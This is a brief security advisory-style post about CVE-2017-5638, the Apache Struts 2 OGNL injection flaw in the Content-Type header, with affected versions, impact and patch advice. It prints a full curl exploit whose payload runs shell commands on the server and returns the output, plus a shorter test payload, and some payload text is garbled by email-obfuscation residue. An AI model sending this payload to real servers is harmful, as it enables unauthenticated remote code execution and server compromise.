Listen to this Post
How the mentioned CVE works
The CVE-2017-5638 vulnerability resides in the Jakarta Multipart parser of Apache Struts 2. The exploit mechanism involves a malicious `Content-Type` HTTP header. When a request with a file upload is sent to a Struts2 endpoint, the framework incorrectly processes the `Content-Type` value. An attacker can craft this header to inject Operating System Command (OSC) expressions. Specifically, by inserting a malicious OGNL expression within the `Content-Type` header, for example, %{_memberAccess['allowStaticMethodAccess']=true,[email protected]@getResponse().getWriter(),res.println('hacked'),res.close()}, the parser evaluates this expression due to improper exception handling during file upload. This flawed error management in the `FileUploadInterceptor` component allows the OGNL code to be executed on the server side with the application’s privileges, leading to remote code execution without any authentication.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability : Remote Code Execution
Severity: Critical
date: 2017-03-07
Prediction: Patch Available
What Undercode Say:
`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target-host.com/upload.action`
How Exploit:
Craft malicious Content-Type header.
Target vulnerable Struts2 file upload.
OGNL expression injection.
Server-side command execution.
Protection from this CVE
Upgrade to Struts 2.3.32 or 2.5.10.1.
Apply official security patch.
Use alternative multipart parser.
Implement WAF rules.
Impact:
Full server compromise.
Data theft.
Arbitrary command execution.
Complete system access.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

